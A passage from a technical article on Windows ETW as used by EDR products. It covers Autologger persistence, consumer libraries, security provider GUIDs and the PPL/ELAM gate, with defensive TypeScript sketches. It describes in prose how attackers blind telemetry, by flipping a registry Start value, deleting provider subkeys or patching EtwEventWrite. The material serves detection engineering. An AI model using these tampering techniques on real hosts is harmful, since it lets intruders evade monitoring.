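      `[${key}\\${p.guid}]`, // one nested subkey per enabled provider
      `"Enabled"=${dword(1)}`,
      `"EnableLevel"=${dword(p.level)}`,
      `"MatchAnyKeyword"=${qword(p.matchAnyKeyword)}`,
    );
  }
  return lines.join("\r\n") + "\r\n";
}
```

Reading the output makes the tampering surface obvious: flipping a single `Start` DWORD, or deleting one provider subkey, is enough to keep a session from ever collecting at boot.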

Autologger session: A registry-persisted boot-time ETW session. The kernel reads `HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\` at boot, creates the session, enables the configured providers, and begins capture before user-mode services start. Defender's Sense agent, CrowdStrike's Falcon sensor, and Sysmon's driver all install autologgers here.

On a stock Windows install, the DiagTrack telemetry listener, Microsoft-Windows-Diagnosis-PCW, the SQM kernel logger, and the EventLog-Application channel autologger all live here; the running ones also show up in logman query -ets. Third-party EDRs add their own. The Palantir CIRT taxonomy [@palantir-tampering-wayback] (about which more in section 11) frames this registry surface as the persistent-tampering target: an attacker who can write to this subtree can disable an EDR's boot-time tracing without ever interacting with the running EDR process. The events of interest never get captured because the session never starts.

There is a related concept worth naming: the Global Logger. This is a special autologger session whose configuration lives in HKLM\SYSTEM\CurrentControlSet\Control\WMI\GlobalLogger. It is the boot-time tracing path that comes online before any user-mode service, including before Sense and the EDR sensor. It exists to capture early-boot kernel events that no later session can record.

Figure: Autologger persistence. HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ holds one subkey per boot-time session (for example DiagTrack-Listener, Defender-Listener, ThirdPartyEDR-Sensor), with the GlobalLogger configured alongside them under its own WMI\GlobalLogger key. Each session subkey carries provider-GUID subkeys, buffer settings (BufferSize / MaximumBuffers / LogFileMode), and a FileName pointing at an .etl path. The kernel reads all of it at boot and starts each session before user-mode services.

Note: logman query -ets enumerates every live trace session on the host. Cross-reference against the subkeys in HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\ to find sessions configured to start at boot. Any unauthorised entry -- a session you do not recognise, an autologger pointed at a destination outside your EDR's data path, a provider GUID you cannot account for -- belongs in your incident response queue. We return to this in section 14.
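The cross-referencing in this note reduces to set comparisons. This TypeScript sketch assumes you have already collected, by whatever means you trust, three lists: the autologger subkey names from the registry, the session names reported by logman query -ets, and an allowlist of sessions your team can account for. `auditTraceSessions` and `SessionAudit` are hypothetical names; the matching is case-insensitive because registry key names are.

```typescript
// Hypothetical audit of ETW sessions against an allowlist.
interface SessionAudit {
  unknownAutologgers: string[];      // boot-time sessions nobody has accounted for
  unknownLiveSessions: string[];     // running sessions nobody has accounted for
  configuredButNotRunning: string[]; // allowlisted autologgers that are not live
}

function auditTraceSessions(
  autologgerKeys: string[],
  liveSessions: string[],
  allowlist: string[],
): SessionAudit {
  // Registry key names are case-insensitive, so compare lowercased names.
  const norm = (name: string): string => name.toLowerCase();
  const allowed = new Set(allowlist.map(norm));
  const live = new Set(liveSessions.map(norm));
  return {
    unknownAutologgers: autologgerKeys.filter((k) => !allowed.has(norm(k))),
    unknownLiveSessions: liveSessions.filter((s) => !allowed.has(norm(s))),
    // Could be a benign disabled logger, or a Start value someone flipped.
    configuredButNotRunning: autologgerKeys.filter(
      (k) => allowed.has(norm(k)) && !live.has(norm(k)),
    ),
  };
}
```

The third list is the one the tampering scenario above produces: an expected session that exists in the registry but never started.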

ERROR_NO_SYSTEM_RESOURCES from EnableTraceEx2 is the runtime symptom of the eight-session cap binding [@ms-enabletraceex2]. SOC engineers debugging multi-EDR coexistence problems should look for it in their sensor's diagnostic output. Eight subscribers per manifest provider is enough for the typical Defender + third-party EDR + Sysmon + research tap arrangement, but a host running multiple research-mode tracers can saturate it.

Persistence solved: a session the OS starts at every boot. But who reads it? That requires a consumer process, and consumers are where the architecture forks along the security spectrum.

7. Consumer architecture: from `OpenTrace` to KrabsETW to a 30-line process watcher

The consumer side of ETW is mechanically simple -- three calls to open a trace, register a callback, and process events -- but the choice of library tells you almost everything about what kind of EDR you are building.

The native pattern, once a controller has started the session with StartTrace, is three Win32 calls. EnableTraceEx2 subscribes the session to a provider GUID with a level and keyword bitmask. OpenTrace takes an EVENT_TRACE_LOGFILE structure that names the session and the EventRecordCallback to invoke, and returns a handle for consumption. ProcessTrace blocks the calling thread, drains events from the kernel's per-CPU buffers, and dispatches each one to that callback. Each event arrives as an EVENT_RECORD containing a header (provider GUID, event ID, level, keyword, opcode, timestamp, process ID, thread ID) and a payload that the consumer decodes.

For manifest providers the consumer decodes via TDH (the Trace Data Helper API) against the system-installed manifest. For TraceLogging providers the consumer decodes from the inline TLV payload. For classic and WPP providers the consumer needs the MOF schema or the producer's PDB respectively.

TDH (Trace Data Helper): The Win32 decoder API that turns a raw `EVENT_RECORD` payload into typed fields, using the registered manifest as the schema source. `TdhGetEventInformation` returns a `TRACE_EVENT_INFO` structure describing the event's field names and types; `TdhFormatProperty` renders each field's value. TDH is what makes manifest events self-describing at the consumer end, even though the schema lives out of band.

Figure: Consumer sequence. The consumer process calls StartTrace(session), then EnableTraceEx2(session, providerGuid, level, keyword), and the kernel ETW subsystem notifies the provider process to begin emitting. The consumer calls OpenTrace(session), receives a TraceHandle, and calls ProcessTrace(handle), which blocks. Each time the provider calls EventWrite(payload), the kernel delivers an EVENT_RECORD to the consumer's callback. ProcessTrace returns only when the session ends.

In production almost no one writes the raw three-call pattern. The library universe settled into a small set of widely-used wrappers, and the choice of wrapper maps almost one-to-one onto the kind of EDR the engineering team is building.

krabsetw [@gh-krabsetw] is a Microsoft-authored C++ library that simplifies session and provider management. Its README explicitly notes the production caller: a C++/CLI wrapper called Microsoft.O365.Security.Native.ETW, "used in production by the Office 365 Security team. It's affectionately referred to as Lobsters." If you are building an in-house EDR or a security analytics pipeline in C++ on Windows, krabsetw is the default choice.

Microsoft.Diagnostics.Tracing.TraceEvent [@nuget-traceprocessing] is the general-purpose .NET ETW library, distributed as a NuGet package and used heavily inside the .NET diagnostics community. Microsoft's separate Microsoft.Windows.EventTracing.Processing.All package is the .NET TraceProcessing API [@ms-etw-portal] that the Windows engineering team uses internally to analyze ETW data from the Windows engineering system.

SilkETW [@gh-silketw], originally released by Ruben Boonen at FireEye in March 2019 [@fireeye-silketw-launch] (now maintained by Mandiant), wraps Microsoft.Diagnostics.Tracing.TraceEvent to expose ETW telemetry to detection-engineering and threat-hunting workflows. SilkETW is the canonical "blue team research" consumer: the tool you reach for when you want to see what events a provider actually emits without writing C++.

Sealighter [@gh-sealighter], by pathtofile, is a krabsetw-wrapping C++ tool that makes multi-provider subscription and filtering tractable from a JSON config. The README states: "Sealighter leverages the feature-rich Krabs ETW Library to enable detailed filtering and triage of ETW and WPP Providers and Events." Sealighter is the canonical "red/blue team triage" consumer: more flexible than SilkETW, less code to write than raw krabsetw.

The pitfalls are universal across all four libraries. The krabsetw README spells two of them out:

"The call to 'start' on the trace object is blocking so thread management may be necessary." -- [@gh-krabsetw]

"Throwing exceptions in the event handler callback ... will cause the trace to stop processing events." -- [@gh-krabsetw]

Both have caused real production outages. An EDR that throws an unhandled exception in its event callback dies silently as an ETW consumer, and the next event the provider emits goes nowhere.

The "throwing in the callback stops the trace" pitfall is the gotcha that bites every team writing their first ETW consumer. Nothing in the callback path recovers from the exception; the trace simply stops processing events. A production-quality consumer wraps every callback in try/catch (or its language equivalent) and routes failures through a side channel, not through the trace itself.
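The defensive pattern described above, wrapping every callback and routing failures out of band, can be factored into a higher-order function so no handler is ever registered unguarded. This TypeScript sketch is library-independent; `guardCallback`, `EventHandler`, and the counter-based `SideChannel` are hypothetical stand-ins for whatever wrapper and telemetry path a real sensor uses.

```typescript
// Library-independent callback guard; all names are hypothetical.
type EventHandler<E> = (event: E) => void;

interface SideChannel {
  failures: number;
  lastError?: unknown;
}

// Wrap a handler so no exception can escape into the trace's callback path.
function guardCallback<E>(handler: EventHandler<E>, side: SideChannel): EventHandler<E> {
  return (event: E) => {
    try {
      handler(event);
    } catch (err) {
      // Record the failure out of band; the trace keeps delivering events.
      side.failures += 1;
      side.lastError = err;
    }
  };
}
```

A rising failure count on the side channel is itself a health signal worth alerting on, because it means events are arriving but being dropped by the sensor's own parsing code.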

To make the structure concrete, here is what a 30-line Microsoft-Windows-Kernel-Process real-time consumer looks like, written in TypeScript pseudocode that mirrors the structure a Sealighter or krabsetw user would write:

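```typescript
// Pseudocode: the structure of a krabsetw / Sealighter consumer
// for the Microsoft-Windows-Kernel-Process provider.
// UserTraceSession, Provider, TraceLevel, and sideChannelLog are hypothetical
// stand-ins declared only so the sketch type-checks; they are not a real
// TypeScript ETW binding.

interface EtwEvent {
  id: number;
  fields: Record<string, string | number>;
}

declare enum TraceLevel { Critical = 1, Error = 2, Warning = 3, Information = 4, Verbose = 5 }

declare class Provider {
  constructor(guid: string);
  level: TraceLevel;
  anyKeyword: bigint;
  onEvent: (event: EtwEvent) => void;
}

declare class UserTraceSession {
  constructor(name: string);
  enable(provider: Provider): void;
  start(): void; // blocks until stop() is called from another thread
  stop(): void;
}

declare function sideChannelLog(error: unknown): void;

const KERNEL_PROCESS_GUID = "{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}";

const session = new UserTraceSession("MyEdrSensor");

const provider = new Provider(KERNEL_PROCESS_GUID);
provider.level = TraceLevel.Information;
provider.anyKeyword = 0xFFFFFFFFFFFFFFFFn; // subscribe to every keyword

provider.onEvent = (event) => {
  try {
    switch (event.id) {
      case 1: { // ProcessStart
        const pid = event.fields.ProcessID;
        const imageName = event.fields.ImageName;
        const cmdLine = event.fields.CommandLine;
        console.log(`Process start pid=${pid} image=${imageName} cmd=${cmdLine}`);
        break;
      }
      case 2: // ProcessStop
        console.log(`Process stop pid=${event.fields.ProcessID}`);
        break;
      case 5: // ImageLoad
        console.log(`Image load ${event.fields.ImageName} into pid=${event.fields.ProcessID}`);
        break;
    }
  } catch (e) {
    // Never let an exception escape the callback: it would end the trace.
    sideChannelLog(e);
  }
};

session.enable(provider);
session.start(); // blocks until session.stop() is called
```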

That code, in production form, is a working EDR sensor's process watcher. Every commercial Windows EDR has something with the same structure inside it.

Note: krabsetw wraps the C++ surface and is the default for production in-house EDRs. TraceEvent wraps .NET and is the default for diagnostics tooling. SilkETW exposes ETW to detection engineers without C++. Sealighter wraps krabsetw with a config file for triage. Pick the library that matches the team that will own the consumer, not the one that looks most powerful.

This is the shape of the ETW-consuming side of tools such as Sysmon, Wazuh, and Elastic Defend: a SYSTEM-privileged user-mode service consuming public providers. But there is one provider this code cannot subscribe to. Try it and EnableTraceEx2 returns ERROR_ACCESS_DENIED. The next two sections are about the GUID that requires a passport.

8. The security provider catalogue: what EDRs actually read

There are roughly 1,300 manifest-based providers shipped on a 2026 Windows 11 24H2 install: the community-maintained jdu2600 inventory [@gh-jdu2600] tracks the count across builds, and the repnz manifest archive [@gh-repnz] holds byte-stable copies of the manifests for cross-version diffing. Eight of those providers carry almost all the security telemetry the EDR vendors read. This is the catalogue.

`Microsoft-Windows-Security-Auditing`

GUID {54849625-5478-4994-A5BA-3E3B0328C30D}. The audit-policy-driven Security event log producer. Event ID 4624 (logon) [@ms-event-4624], 4625 (failed logon), 4634 (logoff), 4688 (process creation, including the command line when the "Include command line in process creation events" policy is enabled) [@learn-microsoft-com-event-4688], 4689 (process exit), and the broader subcategory audit policy events. This is the provider behind the legacy Security event log: when an administrator turns on "audit logon events" in the local security policy, this is the provider that emits the events. EDRs that consume it are reading the same stream the Event Viewer's Security log shows.

`Microsoft-Windows-Kernel-Process`

GUID {22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}. The canonical real-time process telemetry source for non-PPL EDR. Event ID 1 fires on ProcessStart with PID, parent PID, image name, command line, and SID; event ID 2 on ProcessStop; event ID 3 on thread create; event ID 4 on thread exit; event ID 5 on ImageLoad with the loaded module name and base address. SilkETW's launch post enumerates the event record format inline [@fireeye-silketw-launch]. This provider is widely cited in EDR community documentation as available since Windows 7, though no Microsoft primary source pins the exact build.

`Microsoft-Windows-Kernel-File`, `Microsoft-Windows-Kernel-Network`, `Microsoft-Windows-Kernel-Registry`

The per-subsystem siblings of Kernel-Process. Kernel-File surfaces file open / close / read / write / delete operations with the file path and the operating PID. Kernel-Network surfaces TCP and UDP send / receive with the local and remote endpoints. Kernel-Registry surfaces registry create / open / set value / delete with the key path and value name. All three use the manifest-based class and inherit the eight-session cap. EDRs that want full-fidelity per-syscall telemetry without writing kernel callbacks subscribe to these three.

`Microsoft-Antimalware-Scan-Interface`

GUID {2A576B87-09A7-520E-C21A-4942F0271D67}, documented in the Microsoft Learn AMSI portal [@ms-amsi-portal] and surveyed in the Palantir CIRT taxonomy [@palantir-tampering-wayback]. This is the ETW provider that surfaces AMSI scan results: a script block submitted by PowerShell, JScript, VBA, an Office macro engine, or any other AMSI client comes through here after deobfuscation. Whatever string the script engine is about to execute, the registered antimalware engine sees in plaintext, and the result of the scan is published via this provider for any listener.

AMSI (Antimalware Scan Interface): A COM interface exposed by Windows since 2015 that script engines and runtime hosts can call into to submit content for malware scanning. The Microsoft Learn AMSI portal lists PowerShell, JScript and VBScript via Windows Script Host, Office VBA macros, and User Account Control as in-box integrators [@ms-amsi-portal]; the .NET CLR's assembly load path joined the list with .NET Framework 4.8, as documented in Adam Chester's CLR walk-through [@xpn-hiding-dotnet]. The scanned content is the post-deobfuscation form -- the actual code about to execute, not the obfuscated wrapper. Scan results surface via the `Microsoft-Antimalware-Scan-Interface` ETW provider.

The AMSI Operational event log channel typically appears empty by default. The Palantir taxonomy [@palantir-tampering-wayback] notes the keyword bitmask configured for the channel does not surface scan-result events. The events fire on the ETW bus and can be consumed in real time, but they do not land in the user-visible evtx log unless the consumer reconfigures the keyword mask.
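The "fires on the bus but never reaches the log" behaviour follows from how ETW matches an event's keyword bits against each session's masks. The sketch follows the documented `MatchAnyKeyword` / `MatchAllKeyword` semantics of `EnableTraceEx2`, restricted to 32 bits; the AMSI keyword values in the usage lines are hypothetical placeholders, not values read from the provider manifest.

```typescript
// Sketch of ETW's keyword test for a single session. Real keywords and masks
// are 64-bit; this sketch keeps to the low 32 bits so plain numbers suffice.
// Level filtering and a session whose MatchAnyKeyword is zero are not modelled.
function passesKeywordFilter(eventKeyword: number, matchAny: number, matchAll: number): boolean {
  const kw = eventKeyword >>> 0;
  if (kw === 0) return true; // keyword-0 events are written regardless of the masks
  const anyHit = ((kw & matchAny) >>> 0) !== 0;
  const allHit = ((kw & matchAll) >>> 0) === (matchAll >>> 0);
  return anyHit && allHit;
}

// Hypothetical keyword values, for illustration only.
const KW_SCAN_RESULT = 0x1;
const KW_OTHER = 0x2;

// A real-time session asking for everything sees the scan-result event...
console.log(passesKeywordFilter(KW_SCAN_RESULT, 0xffffffff, 0)); // true
// ...while a channel whose mask omits that bit never receives it.
console.log(passesKeywordFilter(KW_SCAN_RESULT, KW_OTHER, 0)); // false
```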

`Microsoft-Windows-PowerShell`

GUID {a0c1853b-5c40-4b15-8766-3cf1c58f985a}. Event ID 4104 is the script-block-logging event that records each PowerShell script block before execution; event ID 4103 records pipeline execution detail; event ID 4100 records errors. The Microsoft Learn about_Logging_Windows reference (Windows PowerShell 5.1) [@ms-powershell-logging] documents EID 4104 verbatim ("EventId 4104 / 0x1008 ... Channel Operational ... Task CommandStart") and the script-block-logging configuration. PowerShell Core 7+ uses a separate ETW provider (PowerShellCore, GUID {f90714a8-5509-434a-bf6d-b1624c8a19a2}). Combined with AMSI, the two providers give an EDR the executed PowerShell content twice: once at AMSI submission, once at script-block logging. Detection engineers use both as cross-checks.
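The cross-check can be sketched as a join on the script text. The record shapes and the idea of keying on whitespace-normalised content are assumptions for illustration: real AMSI and 4104 events carry different metadata, and PowerShell splits large scripts across several 4104 events, which this sketch ignores.

```typescript
// Hypothetical, normalised records for the two PowerShell views.
interface AmsiSubmission { processId: number; content: string; }
interface ScriptBlock4104 { processId: number; scriptBlockText: string; }

// Collapse whitespace so trivial formatting differences do not break the join.
function normalise(s: string): string {
  return s.replace(/\s+/g, " ").trim();
}

// Return AMSI submissions with no matching 4104 script block from the same PID.
// A gap can mean script-block logging is off, the 4104 event was dropped, or
// logging was tampered with in that process: a lead to investigate, not a verdict.
function unmatchedAmsi(amsi: AmsiSubmission[], blocks: ScriptBlock4104[]): AmsiSubmission[] {
  const seen: { [key: string]: boolean } = {};
  for (const b of blocks) {
    seen[b.processId + "|" + normalise(b.scriptBlockText)] = true;
  }
  return amsi.filter(a => !seen[a.processId + "|" + normalise(a.content)]);
}
```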

`Microsoft-Windows-DotNETRuntime`

GUID {e13c0d23-ccbc-4e12-931b-d9cc2eee27e4}, verbatim in Adam Chester's PoC source [@xpn-hiding-dotnet]. The .NET CLR provider. Surfaces assembly load events, JIT compilation, AppDomain creation, and exception throws. Critical for detecting Cobalt Strike's execute-assembly style of in-memory .NET payload loading. This is the provider that goes dark in the section 1 hook scene after the operator's EtwEventWrite patch.

This is also the provider Adam Chester targeted in the canonical March 17, 2020 ETW patching post [@xpn-hiding-dotnet]. The Cobalt Strike execute-assembly workflow produces a loud signal here -- "assembly X loaded into PID Y from in-memory source Z" -- so silencing it locally was a valuable evasion. The story comes back in section 11.

`Microsoft-Windows-Sysmon`

GUID {5770385F-C22A-43E0-BF4C-06F5698FFBD9}, surfaced by wevtutil gp Microsoft-Windows-Sysmon and inventoried in [@gh-jdu2600]; the Microsoft Learn Sysmon page by Russinovich and Garnier [@ms-sysmon] documents authorship, the protected-process status, and the Microsoft-Windows-Sysmon/Operational channel. This is the publishing side of Sysmon. Sysmon's kernel driver SysmonDrv.sys collects events through PsSetCreateProcessNotifyRoutineEx and friends; the user-mode service then republishes via this ETW provider so any consumer (a SIEM forwarder, a SOC dashboard, a custom analytic) can subscribe without writing its own kernel driver. Events also land in the Microsoft-Windows-Sysmon/Operational evtx channel.

`Microsoft-Windows-Threat-Intelligence` (EtwTi)

GUID {f4e1897c-bb5d-5668-f1d8-040f4d8dd344}, verbatim in the fluxsec.red walkthrough [@fluxsec-eti]. The only ETW source in the catalogue that fires from inside the kernel for memory-modifying syscalls. Ten task IDs, all prefixed KERNEL_THREATINT_TASK_:

ALLOCVM (NtAllocateVirtualMemory -- local and cross-process)
PROTECTVM (NtProtectVirtualMemory)
MAPVIEW (section mapping; cross-process and self)
QUEUEUSERAPC (NtQueueApcThread cross-process)
SETTHREADCONTEXT (NtSetContextThread cross-process)
READVM (NtReadVirtualMemory -- local and cross-process)
WRITEVM (NtWriteVirtualMemory -- local and cross-process)
SUSPENDRESUME_THREAD
SUSPENDRESUME_PROCESS
DRIVER_DEVICE

Each task pairs with a 64-bit keyword bitmask that distinguishes LOCAL vs REMOTE (cross-process) and KERNEL_CALLER vs not. The Elastic Security Labs walkthrough [@elastic-doubling-down] lists the Win32 APIs whose underlying syscalls surface here:

"The most notable addition to this visibility is the Microsoft-Windows-Threat-Intelligence Event Tracing for Windows (ETW) provider ... VirtualAlloc, VirtualProtect, MapViewOfFile, VirtualAllocEx, VirtualProtectEx, MapViewOfFile2, QueueUserAPC, SetThreadContext, WriteProcessMemory, ReadProcessMemory(lsass)" -- Elastic Security Labs [@elastic-doubling-down]

Microsoft-Windows-Threat-Intelligence (EtwTi): The kernel-emitted ETW provider for memory-modifying syscalls. GUID `{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}`. Events are emitted from the kernel side of the syscall path (not from a user-mode trampoline), which makes the provider unreachable from a user-mode patcher in the calling process. Consumption is gated behind Protected Process Light at the Antimalware signer level, paired with an Early Launch Antimalware driver. The provider first shipped in the Windows 10 RS-era; the precise build is not stated verbatim in any Microsoft primary located, with community references converging on no later than 1709.
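Because each EtwTi task splits into LOCAL / REMOTE and KERNEL_CALLER variants, a consumer typically decodes the keyword bitmask before deciding whether an event is interesting; user-mode, cross-process allocations and writes are the classic injection shape. The bit layout below (four bits per task, in the order LOCAL, LOCAL_KERNEL_CALLER, REMOTE, REMOTE_KERNEL_CALLER, starting with ALLOCVM at bit 0) is an assumption for illustration that covers only three tasks; check the real values against the provider manifest before relying on them.

```typescript
// ASSUMED keyword layout, for illustration only: four bits per task.
const TASKS = ["ALLOCVM", "PROTECTVM", "MAPVIEW"];
const VARIANTS = ["LOCAL", "LOCAL_KERNEL_CALLER", "REMOTE", "REMOTE_KERNEL_CALLER"];

interface DecodedKeyword {
  task: string;
  remote: boolean;       // cross-process operation
  kernelCaller: boolean; // request originated from kernel mode
}

// Decode every set bit the assumed layout knows about; unknown bits are ignored.
function decodeEtwTiKeyword(keyword: number): DecodedKeyword[] {
  const out: DecodedKeyword[] = [];
  for (let t = 0; t < TASKS.length; t++) {
    for (let v = 0; v < VARIANTS.length; v++) {
      const bit = 1 << (t * VARIANTS.length + v);
      if ((keyword & bit) !== 0) {
        out.push({
          task: TASKS[t],
          remote: VARIANTS[v].indexOf("REMOTE") === 0,
          kernelCaller: VARIANTS[v].indexOf("KERNEL_CALLER") >= 0,
        });
      }
    }
  }
  return out;
}

// User-mode, cross-process events are the shape most injection detections key on.
function isUserModeCrossProcess(d: DecodedKeyword): boolean {
  return d.remote && !d.kernelCaller;
}
```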

The first-ship build remains hedged: the provider GUID and task inventory are well documented in third-party reverse-engineering primaries, but no Microsoft primary located during source verification pins the exact build. The community reference range is Windows 10 1607 (RS1) through 1709 (RS3). The dispositive practical evidence is Yarden Shafir's 2023 Trail of Bits walkthrough [@trailofbits-shafir], which shows live-debugger output of CSFalconService.exe (CrowdStrike) holding EtwConsumer handles to multiple logger IDs simultaneously. By 2023, third-party EDRs were demonstrably consuming EtwTi at scale.

The catalogue as a single screen

Provider name	GUID	Surface	Gate	Primary source
Microsoft-Windows-Security-Auditing	`{54849625-5478-4994-A5BA-3E3B0328C30D}`	Audit-policy events (4624/4625/4688/...)	None (Local Security Policy)	[@ms-event-4624]
Microsoft-Windows-Kernel-Process	`{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}`	Process / thread / image-load events	None (admin)	[@fireeye-silketw-launch], [@gh-jdu2600]
Microsoft-Windows-Kernel-File	(manifest archive)	File I/O syscalls	None (admin)	[@gh-jdu2600], [@gh-repnz]
Microsoft-Windows-Kernel-Network	(manifest archive)	TCP/UDP send/receive	None (admin)	[@gh-jdu2600], [@gh-repnz]
Microsoft-Windows-Kernel-Registry	(manifest archive)	Registry create/open/set/delete	None (admin)	[@gh-jdu2600], [@gh-repnz]
Microsoft-Antimalware-Scan-Interface	`{2A576B87-09A7-520E-C21A-4942F0271D67}`	Post-deobfuscation script content	None (admin)	[@ms-amsi-portal], [@palantir-tampering-wayback]
Microsoft-Windows-PowerShell	`{a0c1853b-5c40-4b15-8766-3cf1c58f985a}`	Script-block logging (4104), pipeline	None (admin)	[@gh-jdu2600]
Microsoft-Windows-DotNETRuntime	`{e13c0d23-ccbc-4e12-931b-d9cc2eee27e4}`	CLR assembly load, JIT, exceptions	None (admin)	[@xpn-hiding-dotnet]
Microsoft-Windows-Sysmon	`{5770385F-C22A-43E0-BF4C-06F5698FFBD9}`	Sysmon driver re-publication	None (admin)	[@gh-jdu2600], [@ms-sysmon]
Microsoft-Windows-Threat-Intelligence	`{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}`	Memory-modifying syscalls (kernel-emitted)	PPL + ELAM (Antimalware signer level)	[@fluxsec-eti], [@elastic-doubling-down]

This is the *security* catalogue. The full Windows manifest-based provider list is roughly 1,300 entries on a current Windows 11 build; performance-tuning, diagnostic, and developer-facing providers fill out the rest. The jdu2600 inventory [@gh-jdu2600] tracks the full list across Win10 versions; the repnz archive [@gh-repnz] preserves byte-stable manifest copies for cross-version diffing.

Nine of the ten rows in that table are accessible to any SYSTEM-privileged user-mode service. The tenth -- EtwTi -- requires a passport. The next section is about who issues the passport.

9. The PPL / ELAM gate: why EtwTi is not for everyone

To consume the one ETW provider that fires from the kernel for memory-modifying syscalls, your service must be (a) a Protected Process Light [@paragmali-com-app-ide], (b) signed at the Antimalware signer level with EKU 1.3.6.1.4.1.311.61.4.1, and (c) vouched for by an Early Launch Antimalware [@paragmali-com-to-userini] driver registered at boot, whose embedded certificate inventory lists the service's signer. Two of those three were not possible for third parties until the Windows 10 RS-era.

fluxsec.red [@fluxsec-eti] gives the prerequisite list verbatim:

"In order to start receiving ETW:TI signals, we need: 1. A service running as Protected Process Light, 2. An Early Launch Antimalware driver and certificate, 3. A logging mechanism." -- [@fluxsec-eti]

Each prerequisite has a story.

Protected Process Light at the Antimalware signer level

Windows 8.1 introduced the protected service concept specifically for antimalware engines. The motivation was simple: a malicious process running as administrator should not be able to inject code into the antimalware service or attach a debugger to it. The Microsoft Learn primary [@ms-protect-am] sets out the model:

"Windows 8.1 introduced a new concept of protected services to protect anti-malware services... In addition to the existing ELAM driver certification requirements, the driver must have an embedded resource section containing the information of the certificates used to sign the user mode service binaries." -- [@ms-protect-am]

PPL is a process-protection level. A given process has a level on the PPL lattice; another process can open it for write or debug only if the requesting process's level is greater than or equal to the target's. Antimalware-PPL is a signer level on that lattice. The kernel admits a process to Antimalware-PPL when its image is signed with a certificate whose EKU includes 1.3.6.1.4.1.311.61.4.1 (Windows Antimalware) and whose certificate is enrolled in an ELAM driver's allow-list at boot.
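The admission rule in the paragraph above reduces to a two-axis comparison. This is a simplification under stated assumptions: the numeric orderings follow the commonly cited protection-type and signer enumerations, and the real kernel check is more involved (it consults a per-signer dominance table with exceptions not modelled here).

```typescript
// Simplified model of the PPL access rule described above.
enum ProtectionType { None = 0, Light = 1, Full = 2 }
enum Signer { None = 0, Authenticode = 1, CodeGen = 2, Antimalware = 3, Lsa = 4, Windows = 5, WinTcb = 6 }

interface ProcessLevel { type: ProtectionType; signer: Signer; }

// Write/debug access is allowed only if the requester is at an equal or higher
// level than the target on both axes: protection type and signer level.
function canOpenForWrite(requester: ProcessLevel, target: ProcessLevel): boolean {
  return requester.type >= target.type && requester.signer >= target.signer;
}
```

An unprotected administrator process (type `None`, signer `None`) therefore cannot open an Antimalware-PPL service for write, however many privileges its token holds.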

Protected Process Light (PPL): A Windows process-protection model. Each process has a PPL level; another process may open it for write or debug only if the requestor is at an equal or higher level. Originally introduced for DRM, the lattice was extended in Windows 8.1 to host the Antimalware signer level for protecting antimalware services from administrative-rights attackers.

Antimalware-PPL: A specific signer level on the PPL lattice. Reserved in Windows 8.1 for Microsoft Defender; opened to third-party EDR vendors via ELAM onboarding in the Windows 10 RS-era. Consumption of the `Microsoft-Windows-Threat-Intelligence` ETW provider is gated at the Antimalware signer level: an `EnableTraceEx2` call against the EtwTi GUID from a caller that is not Antimalware-PPL returns `ERROR_ACCESS_DENIED`. The `EnableTraceEx2` page [@ms-enabletraceex2] documents that error code for callers that lack the documented administrative groups; the per-provider PPL-signer-level check that triggers it for the EtwTi GUID specifically is described in the [@fluxsec-eti] prerequisite list.
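The gate described in that definition can be modelled as one extra check layered on top of the ordinary administrative-group check. `enableTrace`, `Caller`, and the signer ranking are hypothetical names and assumptions for illustration; only the EtwTi GUID and the Win32 error values `ERROR_SUCCESS` (0) and `ERROR_ACCESS_DENIED` (5) are real.

```typescript
// Hypothetical model of the EtwTi consumer gate; not a real Windows API.
const ERROR_SUCCESS = 0;
const ERROR_ACCESS_DENIED = 5;
const ETWTI_GUID = "{f4e1897c-bb5d-5668-f1d8-040f4d8dd344}";

type CallerSigner = "None" | "Authenticode" | "Antimalware" | "Windows" | "WinTcb";
// Assumed ordering, lowest to highest, for the signer-level comparison.
const SIGNER_RANK: { [s: string]: number } = { None: 0, Authenticode: 1, Antimalware: 3, Windows: 5, WinTcb: 6 };

interface Caller {
  inPrivilegedGroup: boolean; // e.g. Administrators, per the documented group check
  protectedProcess: boolean;  // running as a protected process of any kind
  signer: CallerSigner;
}

function enableTrace(caller: Caller, providerGuid: string): number {
  // Ordinary check that applies to every provider.
  if (!caller.inPrivilegedGroup) return ERROR_ACCESS_DENIED;
  // Extra per-provider check: EtwTi requires the Antimalware signer level or higher.
  if (providerGuid.toLowerCase() === ETWTI_GUID) {
    const ok = caller.protectedProcess && SIGNER_RANK[caller.signer] >= SIGNER_RANK["Antimalware"];
    if (!ok) return ERROR_ACCESS_DENIED;
  }
  return ERROR_SUCCESS;
}
```

The design point the sketch makes explicit: a plain SYSTEM or administrator caller passes the first check for every provider in the catalogue, and fails only on the EtwTi GUID.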

Early Launch Antimalware

ELAM is a driver class that loads before any other non-Microsoft boot driver. The Microsoft Learn primary [@ms-elam] describes it:

"Because an ELAM service runs as a PPL (Protected Process Light), you need to debug using a kernel debugger... AM drivers are initialized first and allowed to control the initialization of subsequent boot drivers, potentially not initializing unknown boot drivers." -- [@ms-elam]

The boot sequence runs like this. Winload loads the ELAM driver as part of the early-boot path. The ELAM driver registers a callback via IoRegisterBootDriverCallback and gets to inspect each subsequent boot driver, returning a verdict (initialize / do not initialize / unknown) based on the certificate inventory it carries in its embedded resource section. The kernel honours that verdict. After boot drivers settle, the SCM launches the paired user-mode antimalware service with the LaunchProtected = SERVICE_LAUNCH_PROTECTED_ANTIMALWARE_LIGHT flag, and the kernel admits that service to Antimalware-PPL because its signing certificate matches an entry in the ELAM driver's allow-list.
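The ELAM driver's two jobs in that sequence, classifying boot drivers and vouching for the paired service's signer, can be sketched as two lookups. This is a toy: the `KnownGood` / `KnownBad` / `Unknown` verdicts echo the WDK's `BDCB_CLASSIFICATION` values in simplified form, the real kernel also distinguishes boot-critical known-bad drivers and applies a configurable load policy (reduced here to one hypothetical boolean), and certificates are opaque strings.

```typescript
// Toy model of ELAM's two jobs during boot.
type Verdict = "KnownGood" | "KnownBad" | "Unknown";

interface ElamInventory {
  goodDriverSigners: string[];
  badDriverSigners: string[];
  serviceSigners: string[]; // embedded-resource allow-list for the user-mode service
}

function classifyBootDriver(inv: ElamInventory, driverSigner: string): Verdict {
  if (inv.badDriverSigners.indexOf(driverSigner) >= 0) return "KnownBad";
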